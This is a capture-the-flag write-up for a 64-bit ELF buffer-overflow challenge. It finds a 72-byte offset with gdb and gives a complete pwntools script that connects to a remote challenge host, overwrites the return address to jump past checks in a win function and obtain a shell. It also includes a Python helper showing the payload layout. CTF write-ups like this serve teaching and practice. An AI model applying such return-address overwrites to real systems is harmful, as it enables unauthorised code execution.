![3ba8fbe5e255c70c29fccc800a95390b.png](721577ea7fd748ceb708479a2b5b75d3.png)

Taking a look at the file we see that it's **ELF 64-bit**

```
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ae6fb7020a27e2fdccdb6826a57ccc5bfc0d127a, not stripped
```

Loading it into **radare2** and listing the functions, we can see that there is a **win** function

![1c47e6611914b5e056810c53bb25d00b.png](b534e32c13434280bb405f3d3b750fea.png)

Disassembling that function with `pdf @sym.main`

![e8c2e08aa304218deaf7b7e46cf86239.png](36066f0f53284759b863fd6842427d43.png)

There's a lot going on. It looks like when the function is called it checks for two arguments, `0xdeadbeef` and `0x1337c0de`, and then gives us a shell. What if we skip the variable checks completely and jump straight to `0x004006cf`?

![cf83187a50f22756bcc76e1a9e827fdc.png](e4ba8524d894495ab9b700a5099033b0.png)

Loading the binary into **gdb** (with gef support), we can start poking at it and try to find the offset.

I was having issues with `pattern create/search`, so I did it the old-fashioned way: sending lots of 'A's and 'B's until something looked neat.

Using **gdb with gef** you can use `pi print('A'*100)` to quickly toss a string of characters together.

After sending different lengths, I found that **72** was when we started seeing the 'B' characters leak in: `pi print('A'*72 + 'B')`

![1d0c2ad3a03f013ae93ae75efe95b26e.png](4bb7af9cbe2c43938ab82bd141c02638.png)

Things we know:

1. The offset is **72**
2. The address we want to jump to is **0x004006cf**
3. It's an **ELF 64-bit** binary

That's enough to write a script using **Pwntools**.
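The payload the script builds is simply `filler up to the offset` followed by the target address in little-endian order. As an added example (not the writeup's own code), here is that layout in plain Python, with `struct.pack` standing in for pwntools' `p64`, plus the inverse operation that shows why the 'B' at position 72 is the first byte that lands in the saved return address. The only values used are the offset (72) and address (0x004006cf) from the writeup; the helper names are my own.

```python
import struct

OFFSET = 72           # from the writeup: bytes before the saved return address
TARGET = 0x004006cf   # from the writeup: instruction inside the win function, past the checks


def p64_manual(addr: int) -> bytes:
    """Pack a 64-bit value little-endian, the same 8-byte layout pwntools' p64() produces."""
    if not 0 <= addr < 2 ** 64:
        raise ValueError("address does not fit in 64 bits")
    return struct.pack("<Q", addr)


def build_payload(offset: int, addr: int) -> bytes:
    """Filler bytes up to the saved return address, then the packed address."""
    return b"A" * offset + p64_manual(addr)


def return_address_in(payload: bytes, offset: int) -> int:
    """Read back the 8 bytes at `offset` as the CPU would when it pops the return
    address; this is what gdb shows in RIP once the overflow is triggered."""
    chunk = payload[offset:offset + 8]
    if len(chunk) != 8:
        raise ValueError("payload too short to cover the return address")
    return struct.unpack("<Q", chunk)[0]


if __name__ == "__main__":
    payload = build_payload(OFFSET, TARGET)
    print(payload[OFFSET:].hex())                  # cf06400000000000 -> little-endian 0x4006cf
    print(hex(return_address_in(payload, OFFSET)))  # 0x4006cf

    # The writeup's probe: 72 'A's then a 'B'. Padded out, the 'B' is the low byte
    # of the return address, which is why it shows up in the crash.
    probe = b"A" * OFFSET + b"B" + b"\x00" * 7
    print(hex(return_address_in(probe, OFFSET)))    # 0x42
```

Note that the low byte of the address is emitted first (`cf 06 40 00 ...`), which is the order the 'A'/'B' probing reveals: the byte right after the 72-byte filler is the one the return instruction consumes first.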
Here's mine

```python
from pwn import *

# Remote challenge instance named in the writeup
p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io', 7480)

offset = b'A' * 72                      # filler up to the saved return address
print(p.recvuntil(b'joke\n'))           # consume the prompt (bytes, as current pwntools expects)
p.sendline(offset + p64(0x004006cf))    # overwrite the return address with the win-function target
p.interactive()                         # hand the resulting shell over to us
```

The `p64(0x004006cf)` call packs the address in **little-endian** byte order, which is how it has to be laid out in memory on x86-64, and `p.interactive()` just catches the shell and lets us send input.

![09a1d31923b3c137fd108739b380d6c1.png](fdab4da1fdbc4d5db1aa5f916c4deecf.png)

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #exploit_development #buffer_overflow

Related: